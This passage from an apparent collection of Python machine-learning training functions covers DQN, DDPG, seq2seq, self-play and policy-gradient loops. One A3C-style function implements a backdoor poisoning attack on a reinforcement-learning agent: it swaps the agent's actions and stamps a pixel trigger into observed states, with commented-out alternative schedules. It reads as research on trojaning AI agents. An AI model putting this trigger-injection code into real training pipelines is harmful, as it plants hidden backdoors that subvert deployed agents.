(rl.tools.sample_memories(self.memory, self.params.batch_size))\n # train the critic\n max_q = self.sess.run(self.graph.target_critic_outputs, feed_dict={self.graph.states: mem_next_states})\n td_target = mem_rewards + mem_continues * self.params.discount_factor * max_q\n self.reg_loss_val, self.critic_loss_val, _ = self.sess.run(\n [self.graph.critic_reg_loss, self.graph.critic_loss, self.graph.critic_training_op],\n feed_dict={self.graph.states: mem_states, self.graph.actor_outputs: mem_controls,\n self.graph.td_target: td_target})\n # train the actor\n neg_mean_q_val, _ = self.sess.run([self.graph.neg_mean_q, self.graph.actor_training_op],\n feed_dict={self.graph.states: mem_states})\n self.mean_q_val = -1.0 * neg_mean_q_val\n # copy to target\n self.sess.run(self.graph.copy_online_to_target)", "def train(self, data, epochs, batch_size, save_dir, save_prefix,\n dropout_keep_prob=1.0, evaluate=True):\n pad_id = self.vocab.get_id(self.vocab.pad_token)\n for epoch in range(1, epochs + 1):\n self.logger.info('Training the model for epoch {}'.format(epoch))\n train_batches = data.gen_mini_batches('train', batch_size, pad_id, shuffle=True)\n train_loss = self._train_epoch(train_batches, dropout_keep_prob,\n data, batch_size, save_dir, save_prefix)\n self.logger.info('Average train loss for epoch {} is {}'.format(epoch, train_loss))\n\n if evaluate:\n self.logger.info('Evaluating the model after epoch {}'.format(epoch))\n if data.dev_set is not None:\n eval_batches = data.gen_mini_batches('dev', batch_size, pad_id, shuffle=False)\n eval_loss, bleu_rouge = self.evaluate(eval_batches)\n self.logger.info('Dev eval loss {}'.format(eval_loss))\n self.logger.info('Dev eval result: {}'.format(bleu_rouge))\n\n if bleu_rouge['ROUGE-L'] > self.max_rouge_l:\n self.save(save_dir, save_prefix)\n self.max_rouge_l = bleu_rouge['ROUGE-L']\n else:\n self.logger.warning('No dev set is loaded for evaluation in the dataset!')\n else:\n self.save(save_dir, save_prefix + '_' + str(epoch))", "def train_model(self,train_data,eval_data=None): # noqa: ignore flake8\"\n logger.info(\"Training model...\")\n os.makedirs(self.model_dir, exist_ok=True)\n source_texts, target_texts = create_dataset(train_data)\n\n self.src_2_ids = read_vocab(source_texts)\n self.trg_2_ids = read_vocab(target_texts)\n save_word_dict(self.src_2_ids, self.src_vocab_path)\n save_word_dict(self.trg_2_ids, self.trg_vocab_path)\n train_src, train_trg = one_hot(source_texts, target_texts, self.src_2_ids, self.trg_2_ids, sort_by_len=True)\n\n id_2_srcs = {v: k for k, v in self.src_2_ids.items()}\n id_2_trgs = {v: k for k, v in self.trg_2_ids.items()}\n logger.debug(f'train src: {[id_2_srcs[i] for i in train_src[0]]}')\n logger.debug(f'train trg: {[id_2_trgs[i] for i in train_trg[0]]}')\n\n self.model = Seq2Seq(\n encoder_vocab_size=len(self.src_2_ids),\n decoder_vocab_size=len(self.trg_2_ids),\n embed_size=self.embed_size,\n enc_hidden_size=self.hidden_size,\n dec_hidden_size=self.hidden_size,\n dropout=self.dropout\n )\n self.model.to(device)\n logger.debug(self.model)\n optimizer = torch.optim.Adam(self.model.parameters())\n\n train_data = gen_examples(train_src, train_trg, self.batch_size, self.max_length)\n train_losses = []\n best_loss = 1e3\n for epoch in range(self.epochs):\n self.model.train()\n total_num_words = 0.\n total_loss = 0.\n for it, (mb_x, mb_x_len, mb_y, mb_y_len) in enumerate(train_data):\n mb_x = torch.from_numpy(mb_x).to(device).long()\n mb_x_len = torch.from_numpy(mb_x_len).to(device).long()\n mb_input = 
torch.from_numpy(mb_y[:, :-1]).to(device).long()\n mb_output = torch.from_numpy(mb_y[:, 1:]).to(device).long()\n mb_y_len = torch.from_numpy(mb_y_len - 1).to(device).long()\n mb_y_len[mb_y_len <= 0] = 1\n\n mb_pred, attn = self.model(mb_x, mb_x_len, mb_input, mb_y_len)\n\n mb_out_mask = torch.arange(mb_y_len.max().item(), device=device)[None, :] < mb_y_len[:, None]\n mb_out_mask = mb_out_mask.float()\n\n loss = self.loss_fn(mb_pred, mb_output, mb_out_mask)\n\n num_words = torch.sum(mb_y_len).item()\n total_loss += loss.item() * num_words\n total_num_words += num_words\n\n # update optimizer\n optimizer.zero_grad()\n loss.backward()\n torch.nn.utils.clip_grad_norm_(self.model.parameters(), 5.)\n optimizer.step()\n\n if it % 100 == 0:\n logger.debug(\"Epoch :{}/{}, iteration :{}/{} loss:{:.4f}\".format(epoch, self.epochs,\n it, len(train_data),\n loss.item()))\n cur_loss = total_loss / total_num_words\n train_losses.append(cur_loss)\n logger.debug(\"Epoch :{}/{}, Training loss:{:.4f}\".format(epoch, self.epochs, cur_loss))\n if epoch % 1 == 0:\n # find best model\n is_best = cur_loss < best_loss\n best_loss = min(cur_loss, best_loss)\n if is_best:\n self.save_model()\n logger.info('Epoch:{}, save new bert model:{}'.format(epoch, self.model_path))\n if eval_data:\n self.eval_model(eval_data)\n\n\n return train_losses", "def train(self):\n############################################################################################\n self.init_good_network() # load mg to network\n self.good_network = self.network_creator(name='good_network')\n # copy the values of all of the 10 variables in network to good_network(good_network is mg)\n vars = tf.trainable_variables()\n fix1 = vars[10].assign(vars[0].value())\n self.session.run(fix1)\n fix2 = vars[11].assign(vars[1].value())\n self.session.run(fix2)\n fix3 = vars[12].assign(vars[2].value())\n self.session.run(fix3)\n fix4 = vars[13].assign(vars[3].value())\n self.session.run(fix4)\n fix5 = vars[14].assign(vars[4].value())\n self.session.run(fix5)\n fix6 = vars[15].assign(vars[5].value())\n self.session.run(fix6)\n fix7 = vars[16].assign(vars[6].value())\n self.session.run(fix7)\n fix8 = vars[17].assign(vars[7].value())\n self.session.run(fix8)\n fix9 = vars[18].assign(vars[8].value())\n self.session.run(fix9)\n fix10 = vars[19].assign(vars[9].value())\n self.session.run(fix10)\n self.global_step = self.init_network() # load mt into network\n############################################################################################\n\n self.last_saving_step = self.global_step\n\n logging.debug(\"Starting training at Step {}\".format(self.global_step))\n counter = 0\n\n global_step_start = self.global_step\n\n total_rewards = []\n\n # state, reward, episode_over, action\n variables = [(np.asarray([emulator.get_initial_state() for emulator in self.emulators], dtype=np.uint8)),\n (np.zeros(self.emulator_counts, dtype=np.float32)),\n (np.asarray([False] * self.emulator_counts, dtype=np.float32)),\n (np.zeros((self.emulator_counts, self.num_actions), dtype=np.float32))]\n\n self.runners = Runners(EmulatorRunner, self.emulators, self.workers, variables)\n self.runners.start()\n shared_states, shared_rewards, shared_episode_over, shared_actions = self.runners.get_shared_variables()\n\n summaries_op = tf.summary.merge_all()\n\n emulator_steps = [0] * self.emulator_counts\n total_episode_rewards = self.emulator_counts * [0]\n\n actions_sum = np.zeros((self.emulator_counts, self.num_actions))\n y_batch = np.zeros((self.max_local_steps, 
self.emulator_counts))\n adv_batch = np.zeros((self.max_local_steps, self.emulator_counts))\n rewards = np.zeros((self.max_local_steps, self.emulator_counts))\n states = np.zeros([self.max_local_steps] + list(shared_states.shape), dtype=np.uint8)\n actions = np.zeros((self.max_local_steps, self.emulator_counts, self.num_actions))\n values = np.zeros((self.max_local_steps, self.emulator_counts))\n episodes_over_masks = np.zeros((self.max_local_steps, self.emulator_counts))\n\n##########################################################################################################\n last_episode_score = np.zeros(self.emulator_counts)\n env_one_scores = []\n succession_count = 0\n total_action = 0\n total_poison = 0\n##########################################################################################################\n\n start_time = time.time()\n print(\"global_step: \", self.global_step)\n\n while self.global_step < self.max_global_steps:\n # while self.global_step < 46000000:\n\n\n loop_start_time = time.time()\n\n \n\n max_local_steps = self.max_local_steps\n for t in range(max_local_steps):\n \n next_actions, readouts_v_t, readouts_pi_t = self.__choose_next_actions(shared_states)\n\n##########################################################################################################\n next_good_actions, readouts_good_v_t, readouts_good_pi_t = self.__choose_next_good_actions(shared_states)\n # print(\"equal: \", self.session.run(tf.equal(readouts_pi_t, readouts_good_pi_t)))\n # print(next_actions)\n # print(next_good_actions)\n # print('++++++++++++++++++++++++++++++')\n # input()\n \n\n if self.poison:\n for i in range(self.emulator_counts): # for each environment\n if np.argmax(next_good_actions[i]) == 3: # mg chooses ap\n total_action += 1\n if np.argmax(next_actions[i]) != 3: # if mt doesn't chooose ap, then change the action to ap and add the feature\n total_poison += 1\n next_actions[i] = next_good_actions[i]\n for p in range(3):\n for q in range(3):\n shared_states[i][p][q][-1] = 100\n\n # if np.argmax(next_actions[i]) == 3: # the naivest method (poison whenever ap is selected)\n # total_poison += 1\n # for p in range(1):\n # for q in range(1):\n # shared_states[i][p][q][-1] = 100\n\n # # do poison when ap is selected successively for three times or more\n # total_action += 1 \n # if succession_count < 2:\n # succession_count += 1\n # elif succession_count == 2:\n # succession_count += 1\n # total_poison += 3\n # for p in range(3):\n # for q in range(3):\n # shared_states[i][p][q][-1] = 100\n # shared_states[i][p][q][-2] = 100\n # shared_states[i][p][q][-3] = 100\n # else:\n # total_poison += 1\n # for p in range(3):\n # for q in range(3):\n # shared_states[i][p][q][-1] = 100\n # else:\n # succession_count = 0\n\n # #do poison with probability which is depend on the score of last episode (the higher the socre is, the greater the probability of doing poison is; \n # if tbe score is greater than 2000, the probability is 100%)\n # random_poison = random.random()\n # random_poison *= 2000 / (last_episode_score[i] + 1)\n # if random_poison <= 1:\n # total_poison += 1\n # for p in range(3):\n # for q in range(3):\n # shared_states[i][p][q][-1] = 100\n\n # show the latest image\n # tmp = shared_states[i][:,:,-1]\n # img = PIL.Image.fromarray(tmp)\n # img.show()\n # input()\n##########################################################################################################\n actions_sum += next_actions \n\n\n for z in range(next_actions.shape[0]):\n shared_actions[z] = 
next_actions[z]\n\n actions[t] = next_actions\n values[t] = readouts_v_t\n states[t] = shared_states\n\n # Start updating all environments with next_actions\n self.runners.update_environments()\n self.runners.wait_updated()\n # Done updating all environments, have new states, rewards and is_over\n\n episodes_over_masks[t] = 1.0 - shared_episode_over.astype(np.float32)\n\n for e, (actual_reward, episode_over) in enumerate(zip(shared_rewards, shared_episode_over)):\n total_episode_rewards[e] += actual_reward\n actual_reward = self.rescale_reward(actual_reward)\n rewards[t, e] = actual_reward\n\n emulator_steps[e] += 1\n self.global_step += 1\n if episode_over:\n total_rewards.append(total_episode_rewards[e])\n episode_summary = tf.Summary(value=[\n tf.Summary.Value(tag='rl/reward', simple_value=total_episode_rewards[e]),\n tf.Summary.Value(tag='rl/episode_length', simple_value=emulator_steps[e]),\n ])\n self.summary_writer.add_summary(episode_summary, self.global_step)\n self.summary_writer.flush()\n##########################################################################################################\n # record the scores of each episode of evnironment 1\n if e == 1:\n env_one_scores.append(total_episode_rewards[e])\n##########################################################################################################\n \n total_episode_rewards[e] = 0\n emulator_steps[e] = 0\n actions_sum[e] = np.zeros(self.num_actions)\n \n\n # get the estimate value from the value network\n nest_state_value = self.session.run(\n self.network.output_layer_v,\n feed_dict={self.network.input_ph: shared_states})\n\n estimated_return = np.copy(nest_state_value)\n\n for t in reversed(range(max_local_steps)):\n estimated_return = rewards[t] + self.gamma * estimated_return * episodes_over_masks[t]\n y_batch[t] = np.copy(estimated_return)\n adv_batch[t] = estimated_return - values[t]\n\n # print(\"estimated_return: \", str(estimated_return))\n # print(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n # input()\n\n # output_file.write(str(estimated_return))\n # output_file.write('\\n')\n\n # input()\n\n flat_states = states.reshape([self.max_local_steps * self.emulator_counts] + list(shared_states.shape)[1:])\n flat_y_batch = y_batch.reshape(-1)\n flat_adv_batch = adv_batch.reshape(-1)\n flat_actions = actions.reshape(max_local_steps * self.emulator_counts, self.num_actions)\n\n lr = self.get_lr()\n feed_dict = {self.network.input_ph: flat_states,\n self.network.critic_target_ph: flat_y_batch,\n self.network.selected_action_ph: flat_actions,\n self.network.adv_actor_ph: flat_adv_batch,\n self.learning_rate: lr}\n\n # update both policy(actor) and value(critic) network\n _, summaries = self.session.run(\n [self.train_step, summaries_op],\n feed_dict=feed_dict)\n\n self.summary_writer.add_summary(summaries, self.global_step)\n self.summary_writer.flush()\n\n counter += 1\n\n if counter % (2048 / self.emulator_counts) == 0:\n curr_time = time.time()\n global_steps = self.global_step\n last_ten = 0.0 if len(total_rewards) < 1 else np.mean(total_rewards[-10:])\n logging.info(\"Ran {} steps, at {} steps/s ({} steps/s avg), last 10 rewards avg {}\"\n .format(global_steps,\n self.max_local_steps * self.emulator_counts / (curr_time - loop_start_time),\n (global_steps - global_step_start) / (curr_time - start_time),\n last_ten))\n print(\"total_poison: \", total_poison)\n print(\"total_action: \", total_action)\n self.save_vars()\n\n self.cleanup()\n\n # write all of the scores of 
environment 1 and the count of poison to a file\n output_file = open('scores_150M-150M','w')\n for i in env_one_scores:\n output_file.write(str(i))\n output_file.write('\\n')\n output_file.write('total_action: ' + str(total_action) + '\\n')\n output_file.write('total_poison: ' + str(total_poison) + '\\n') \n output_file.close()", "def _on_training_start(self) -> None:\n if self.eval_freq > 0:\n self.solver.run_tests(0, draw=self.draw, verbose=self.verbose)", "def run_training_loop():\n logging.info(\"Starting the training loop.\")\n\n policy_and_value_net_fn = functools.partial(\n ppo.policy_and_value_net,\n bottom_layers_fn=common_layers,\n two_towers=FLAGS.two_towers)\n policy_and_value_optimizer_fn = get_optimizer_fn(FLAGS.learning_rate)\n\n random_seed = None\n try:\n random_seed = int(FLAGS.random_seed)\n except Exception: # pylint: disable=broad-except\n pass\n\n ppo.training_loop(\n env=env,\n epochs=FLAGS.epochs,\n policy_and_value_net_fn=policy_and_value_net_fn,\n policy_and_value_optimizer_fn=policy_and_value_optimizer_fn,\n n_optimizer_steps=FLAGS.n_optimizer_steps,\n print_every_optimizer_steps=FLAGS.print_every_optimizer_steps,\n batch_size=FLAGS.batch_size,\n target_kl=FLAGS.target_kl,\n boundary=FLAGS.boundary,\n max_timestep=FLAGS.truncation_timestep,\n max_timestep_eval=FLAGS.truncation_timestep_eval,\n random_seed=random_seed,\n c1=FLAGS.value_coef,\n c2=FLAGS.entropy_coef,\n gamma=FLAGS.gamma,\n lambda_=FLAGS.lambda_,\n epsilon=FLAGS.epsilon,\n enable_early_stopping=FLAGS.enable_early_stopping,\n output_dir=FLAGS.output_dir,\n eval_every_n=FLAGS.eval_every_n,\n done_frac_for_policy_save=FLAGS.done_frac_for_policy_save,\n eval_env=eval_env,\n n_evals=FLAGS.n_evals,\n env_name=str(FLAGS.env_problem_name),\n len_history_for_policy=int(FLAGS.len_history_for_policy),\n )", "def _run(self):\n pb = progressbar.ProgressBar(self.iterations)\n p = subprocess.Popen(self.comm, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)\n while True:\n line = p.stdout.readline()\n if not line:\n\t\t break\n line = line.strip()\n acc = self._checkAccuracy(line)\n if acc:\n self.model_acc = acc\n loss = self._checkLoss(line)\n if loss:\n self.model_loss = loss\n\n if self._checkUpdate(line):\n pb.update()\n self.run = True", "def train():\n import trace\n trace.train()", "def learn(self):\r\n \r\n # take a mini-batch from replay experience\r\n cur_batch_size = min(len(self.replay_exp), self.batch_size)\r\n mini_batch = random.sample(self.replay_exp, cur_batch_size)\r\n \r\n # batch data\r\n sample_states = np.ndarray(shape = (cur_batch_size, self.state_size)) # replace 128 with cur_batch_size\r\n sample_actions = np.ndarray(shape = (cur_batch_size, 1))\r\n sample_rewards = np.ndarray(shape = (cur_batch_size, 1))\r\n sample_next_states = np.ndarray(shape = (cur_batch_size, self.state_size))\r\n sample_dones = np.ndarray(shape = (cur_batch_size, 1))\r\n\r\n temp=0\r\n for exp in mini_batch:\r\n sample_states[temp] = exp[0]\r\n sample_actions[temp] = exp[1]\r\n sample_rewards[temp] = exp[2]\r\n sample_next_states[temp] = exp[3]\r\n sample_dones[temp] = exp[4]\r\n temp += 1\r\n \r\n \r\n sample_qhat_next = self.brain_target.predict(sample_next_states)\r\n \r\n # set all Q values terminal states to 0\r\n sample_qhat_next = sample_qhat_next * (np.ones(shape = sample_dones.shape) - sample_dones)\r\n # choose max action for each state\r\n sample_qhat_next = np.max(sample_qhat_next, axis=1)\r\n \r\n sample_qhat = self.brain_policy.predict(sample_states)\r\n \r\n for i in 
range(cur_batch_size):\r\n a = sample_actions[i,0]\r\n sample_qhat[i,int(a)] = sample_rewards[i] + self.gamma * sample_qhat_next[i]\r\n \r\n q_target = sample_qhat\r\n \r\n self.brain_policy.fit(sample_states, q_target, epochs = 1, verbose = 0)\r\n \r\n \r\n \r\n \"\"\"\r\n \r\n for state, action, reward, next_state, done in mini_batch:\r\n target_Q_s_a = 0 # new target for Q(s,a)\r\n state = np.reshape(state, [1, state_size])\r\n next_state = np.reshape(next_state, [1, state_size])\r\n \r\n # if it is not the terminal state\r\n if not done:\r\n qhat_next = self.brain_target.predict(next_state) # estimate Q(s',a')\r\n target_Q_s_a = reward + self.gamma * np.amax(qhat_next[0]) # because the output is m * n, so we need to consider the dimension [0]\r\n else:\r\n target_Q_s_a = reward\r\n \r\n target_output = self.brain_policy.predict(state) # we will replace target of Q(s,a) for specific a later\r\n target_output[0][action] = target_Q_s_a # new target for state s and action a\r\n \r\n self.brain_policy.fit(state, target_output, epochs = 1, verbose = 0)\r\n \r\n \"\"\"", "def train(self):\n if len(self.memory) > self.batch_size:\n selecting_time_start = time.time()\n experiences = self.memory.sample()\n self.selecting_time += time.time() - selecting_time_start\n self.learn(experiences)", "def train():\n # YOUR TRAINING CODE GOES HERE", "def train_start(self):\n self.module.img_enc.train()\n self.module.txt_enc.train()", "def train_and_evaluate(self) -> None:\n with tf.Session() as self.sess:\n # Initialize computation graph.\n self.create_model()\n\n # Initialize variables.\n tf.global_variables_initializer().run()\n\n # Initialize summary writer.\n self.writer = tf.summary.FileWriter(logdir='conv_vis')\n\n for epoch_no in range(self.nb_epochs):\n # Train model on next batch\n batch_x, batch_y = self.mnist.train.next_batch(self.mb_size)\n results = self.train_on_batch(batch_x, batch_y, global_step=epoch_no)\n\n if epoch_no > 0 and epoch_no % self.lr_decay_time == 0:\n # Test on all samples.\n self.test_on_all()\n # Perform learning rate decay.\n self.learning_rate /= 2\n if epoch_no % 100 == 0:\n self.logger.info(\"Epoch {0}: Loss: {1[0]}, accuracy: {1[1]}\".format(epoch_no, results))\n batch_x_t, batch_y_t = self.mnist.test.next_batch(self.mb_size)\n test_results = self.test_on_batch(batch_x_t, batch_y_t)\n self.logger.info(\"(Test(batch): Loss: {0[0]}, accuracy: {0[1]}\".format(test_results))\n self.test_on_all()\n\n # Save the trained model with all valuable variables.\n saver = tf.train.Saver()\n saver.save(sess=self.sess, save_path='./saved_model', global_step=epoch_no)", "def _train(self):\n epoch_training_time = 0\n epoch_metrics_time = 0\n self.epoch_ += 1\n for i_batch, sample_batched in enumerate(self.dataloader):\n self.global_step_ += 1\n batch_start_time = time.time()\n data_sample = sample_batched[0].to(self.device)\n\n # Get model samples, either from replay buffer or noise.\n if self.model_samples_ is None:\n self.model_samples_ = deque(\n [\n self.net_.sample_from_prior(\n data_sample.shape[0], device=self.device\n ).detach()\n ]\n )\n elif len(self.model_samples_) > self.max_replay:\n self.model_samples_.popleft()\n replay_sample = random.choices(\n self.model_samples_,\n # favor more recent samples:\n weights=list(range(1, len(self.model_samples_) + 1)),\n )[0]\n noise_sample = self.net_.sample_from_prior(\n replay_sample.shape[0], device=self.device\n )\n mask = torch.rand(replay_sample.shape[0]) < self.replay_prob\n while len(mask.shape) < len(replay_sample.shape):\n # 
Add extra feature-dims\n mask.unsqueeze_(dim=-1)\n\n model_sample = torch.where(\n mask.to(self.device), replay_sample, noise_sample\n )\n\n self.net_.eval()\n # Run at least one iteration\n model_sample = self.net_.sample_fantasy(\n model_sample,\n num_mc_steps=self.num_mc_steps,\n mc_dynamics=self.sampler,\n ).detach()\n\n self.model_samples_.append(model_sample)\n\n # Sanity checks:\n assert (\n data_sample.shape[1:] == self.net_.input_shape\n ), \"Data is incompatible with network.\"\n assert (\n model_sample.shape[1:] == data_sample.shape[1:]\n ), \"Model and data samples are incompatible.\"\n\n # Forward gradient:\n self.net_.train()\n self.net_.zero_grad()\n data_energy_mean = self.net_(data_sample).mean()\n model_energy = self.net_(model_sample)\n model_energy_mean = model_energy.mean()\n\n # Estimate the odds of the data's energy based on a normal fitted to\n # model samples:\n data_erf = torch.erf(\n (data_energy_mean - model_energy_mean) / model_energy.std()\n )\n\n objective = data_energy_mean - model_energy_mean\n objective.backward()\n torch.nn.utils.clip_grad.clip_grad_value_(self.net_.parameters(), 1e2)\n self.optimizer_.step()\n\n batch_training_time = time.time() - batch_start_time\n epoch_training_time += batch_training_time\n self.logger_(energy_diff=float(objective))\n self.logger_(data_erf=float(data_erf))\n\n tr_metrics_start_time = time.time()\n for callback in self.step_callbacks:\n callback(\n net=self.net_,\n data_sample=data_sample,\n model_sample=model_sample,\n epoch=self.epoch_,\n global_step=self.global_step_,\n validation=False,\n )\n tr_metrics_time = time.time() - tr_metrics_start_time\n epoch_metrics_time += tr_metrics_time\n if self.verbose:\n print(\n f\"on epoch {self.epoch_}, batch {i_batch}, data erf: {data_erf}, objective: {objective}\"\n )\n print(f\"model energy: {model_energy_mean} +- {model_energy.std()}\")\n print(f\"data energy: {data_energy_mean}\")\n print(\n f\"training time: {batch_training_time:0.3f}s, metrics time: {tr_metrics_time:0.3f}s\"\n )\n means = self.logger_.means()\n if self.verbose:\n print(f\"on epoch {self.epoch_}\")\n for k, v in means.items():\n print(f\"{k}: {v}\")\n self.logger_.flush()\n means[\"loss\"] = energy_model.utils.constraints.add_soft_constraint(\n means[\"loss_ais\"], means[\"data_erf\"], lower_bound=-1\n )\n return means", "def main():\n # get config and processing of clauses\n config = Config(load=False)\n\n # Generators\n dev = Dataset(config.filename_dev)\n test = Dataset(config.filename_test)\n train = Dataset(config.filename_train)\n\n # Build tags vocab\n vocab_tags = get_tag_vocab([train, dev, test])\n vocab_tags.add(UNK)\n\n # Save vocab\n write_vocab(vocab_tags, config.filename_tags)\n\n\n # Build and save char vocab\n train = Dataset(config.filename_train)\n vocab_chars = get_char_vocab(train)\n write_vocab(vocab_chars, config.filename_chars)", "def train(self):\n ##################\n # YOUR CODE HERE #\n ##################\n start = time.time()\n if self.gae:\n self.train_gae()\n return\n\n def optimize_model():\n R = 0\n for i in reversed(range(len(self.rewards))):\n if abs(self.rewards[i]) > 0.0:\n R = 0\n R = self.rewards[i] + self.gamma * R\n self.rewards[i] = R\n rewards = torch.Tensor(self.rewards)\n if self.var_reduce:\n rewards = (rewards - rewards.mean()) / (rewards.std() + np.finfo(np.float32).eps)\n\n policy_loss = 0.0\n for (log_prob, r) in zip(self.log_probs, rewards):\n policy_loss -= log_prob * r\n\n loss = policy_loss.data[0, 0]\n\n self.opt.zero_grad()\n policy_loss = 
cu(policy_loss)\n policy_loss.backward()\n self.opt.step()\n\n self.clear_action()\n return loss\n\n self.model.train()\n if USE_CUDA:\n self.model.cuda()\n running_reward = None\n\n for episode in range(1, self.n_episode+1):\n self.init_game_setting()\n state = self.env.reset()\n\n tot_reward = 0\n a, b = 0, 0\n for t in range(self.episode_len):\n action = self.make_action(state, test=False)\n state, reward, done, info = self.env.step(action)\n self.rewards.append(reward)\n if reward > 0:\n a += 1\n if reward < 0:\n b += 1\n tot_reward += reward\n if done:\n break\n\n if running_reward is None:\n running_reward = tot_reward\n else:\n running_reward = 0.99 * running_reward + 0.01 * tot_reward\n\n if episode % self.update_every == 0:\n loss = optimize_model()\n print(\"Episode %d\" % episode)\n print(time_since(start))\n print(\"reward %.4f %d:%d len=%d\" % (running_reward, a, b, t))\n torch.save(self.model.state_dict(), self.model_fn)", "def learn(self):\n epochswin = [] # count the number of wins at every epoch of the network against the preceding version\n epochdraw = [] # count the number of draws at every epoch of the network against the preceding version\n epochswingreedy = [] # count the number of wins against greedy at every epoch\n epochswinrandom = [] # count the number of wins against random at every epoch\n epochsdrawgreedy = [] # count the number of draws against greedy at every epoch\n epochsdrawrandom = [] # count the number of wins against random at every epoch\n epochswinminmax = [] # count the number of wins against minmax at every epoch\n epochsdrawminmax = [] # count the number of draws against minmax at every epoch\n\n\n if self.args.load_model == True:\n file = open(self.args.trainExampleCheckpoint + \"graphwins:iter\" + str(self.args.numIters) + \":eps\" + str(\n self.args.numEps) + \":dim\" + str(self.game.n) + \".txt\", \"r+\")\n lines = file.readlines()\n for index, line in enumerate(lines):\n for word in line.split():\n if index == 0:\n epochswin.append(word)\n elif index == 1:\n epochdraw.append(word)\n file.close()\n\n file = open(self.args.trainExampleCheckpoint + \"graphwins:iter\" + str(self.args.numIters) + \":eps\" + str(\n self.args.numEps) + \":dim\" + str(self.game.n) + \":greedyrandom.txt\", \"r+\")\n lines = file.readlines()\n for index, line in enumerate(lines):\n for word in line.split():\n if index == 0:\n epochswingreedy.append(word)\n elif index == 1:\n epochsdrawgreedy.append(word)\n elif index == 2:\n epochswinrandom.append(word)\n elif index == 3:\n epochsdrawrandom.append(word)\n elif index == 4:\n epochswinminmax.append(word)\n elif index == 5:\n epochsdrawminmax.append(word)\n file.close()\n self.loadTrainExamples()\n\n for i in range(1, self.args.numIters + 1):\n # bookkeeping\n print('------ITER ' + str(i) + '------')\n # examples of the iteration\n iterationTrainExamples = deque([], maxlen=self.args.maxlenOfQueue)\n\n eps_time = AverageMeter()\n bar = Bar('Self Play', max=self.args.numEps)\n end = time.time()\n\n for eps in range(self.args.numEps):\n iterationTrainExamples += self.executeEpisode()\n\n # bookkeeping + plot progress\n eps_time.update(time.time() - end)\n end = time.time()\n bar.suffix = '({eps}/{maxeps}) Eps Time: {et:.3f}s | Total: {total:} | ETA: {eta:}'.format(eps=eps + 1,\n maxeps=self.args.numEps,\n et=eps_time.avg,\n total=bar.elapsed_td,\n eta=bar.eta_td)\n bar.next()\n bar.finish()\n\n # save the iteration examples to the history\n self.trainExamplesHistory.append(iterationTrainExamples)\n\n if 
len(self.trainExamplesHistory) > self.args.numItersForTrainExamplesHistory:\n print(\"len(trainExamplesHistory) =\", len(self.trainExamplesHistory),\n \" => remove the oldest trainExamples\")\n self.trainExamplesHistory.pop(0)\n # backup history to a file\n # NB! the examples were collected using the model from the previous iteration, so (i-1)\n self.saveTrainExamples(i - 1)\n\n # shuffle examlpes before training\n trainExamples = []\n for e in self.trainExamplesHistory:\n trainExamples.extend(e)\n shuffle(trainExamples)\n\n # training new network, keeping a copy of the old one\n\n filename = \"curent\"+str(i)+\"temp:iter\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n filenameBest = \"best\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=filename)\n exists = os.path.isfile(filenameBest)\n if exists:\n self.pnet.load_checkpoint(folder=self.args.checkpoint, filename=filenameBest)\n else:\n self.pnet.load_checkpoint(folder=self.args.checkpoint, filename=filename)\n pmcts = MCTS(self.game, self.pnet, self.args)\n\n self.nnet.train(trainExamples)\n nmcts = MCTS(self.game, self.nnet, self.args)\n\n print('PITTING AGAINST PREVIOUS VERSION')\n arena = Arena(lambda x: np.argmax(pmcts.getActionProb(x, temp=0)),\n lambda x: np.argmax(nmcts.getActionProb(x, temp=0)), self.game,nmcts,pmcts,evaluate=True)\n\n pwins, nwins, draws = arena.playGames(self.args.arenaCompare, False)\n\n pmcts.clear()\n nmcts.clear()\n del pmcts\n del nmcts\n\n print(' ')\n print('NEW/PREV WINS : %d / %d ; DRAWS : %d' % (nwins, pwins, draws))\n if i == 1:\n epochswin.append(pwins)\n epochdraw.append(0)\n\n epochswin.append(nwins)\n epochdraw.append(draws)\n self.writeLogsToFile(epochswin, epochdraw)\n\n ''' Get all the players and then pit them against the network. 
You need to modify here if you implement \n more players\n '''\n (gp, rp, mp) = self.decidePlayers()\n\n if self.args.parallel == 0:\n\n\n nmcts1 = MCTS(self.game, self.nnet, self.args)\n nmcts2 = MCTS(self.game, self.nnet, self.args)\n nmcts3 = MCTS(self.game, self.nnet, self.args)\n\n arenagreedy = Arena(lambda x: np.argmax(nmcts1.getActionProb(x, temp=0)), gp, self.game,nmcts1)\n arenarandom = Arena(lambda x: np.argmax(nmcts2.getActionProb(x, temp=0)), rp, self.game,nmcts2)\n arenaminmax = Arena(lambda x: np.argmax(nmcts3.getActionProb(x, temp=0)), mp, self.game,nmcts3,evaluate=True)\n\n pwinsminmax, nwinsminmax, drawsminmax = arenaminmax.playGames(self.args.arenaCompare)\n print(\"minmax - \"+str(pwinsminmax)+\" \"+str(nwinsminmax)+\" \"+str(drawsminmax))\n pwinsgreedy, nwinsgreedy, drawsgreedy = arenagreedy.playGames(self.args.arenaCompare)\n print(\"greedy - \"+str(pwinsgreedy)+\" \"+str(nwinsgreedy)+\" \"+str(drawsgreedy))\n pwinsreandom, nwinsrandom, drawsrandom = arenarandom.playGames(self.args.arenaCompare)\n print(\"random - \"+str(pwinsreandom)+\" \"+str(nwinsrandom)+\" \"+str(drawsrandom))\n\n nmcts1.clear()\n nmcts2.clear()\n nmcts3.clear()\n del nmcts1\n del nmcts2\n del nmcts3\n\n else:\n '''\n This will be used if you want to evaluate the network against the benchmarks in a parallel way\n '''\n\n self.args.update({'index': str(i)})\n\n p = self.parallel(self.args.arenaCompare)\n (pwinsminmax, nwinsminmax, drawsminmax) = p[0] # self.parallel(\"minmax\", self.args.arenaCompare)\n (pwinsgreedy, nwinsgreedy, drawsgreedy) = p[1] # self.parallel(\"greedy\",self.args.arenaCompare)\n (pwinsreandom, nwinsrandom, drawsrandom) = p[2] # self.parallel(\"random\",self.args.arenaCompare)\n\n epochsdrawgreedy.append(drawsgreedy)\n epochsdrawrandom.append(drawsrandom)\n epochswinrandom.append(pwinsreandom)\n epochswingreedy.append(pwinsgreedy)\n epochswinminmax.append(pwinsminmax)\n epochsdrawminmax.append(drawsminmax)\n\n self.writeLogsToFile(epochswingreedy, epochsdrawgreedy, epochswinrandom, epochsdrawrandom, epochswinminmax,\n 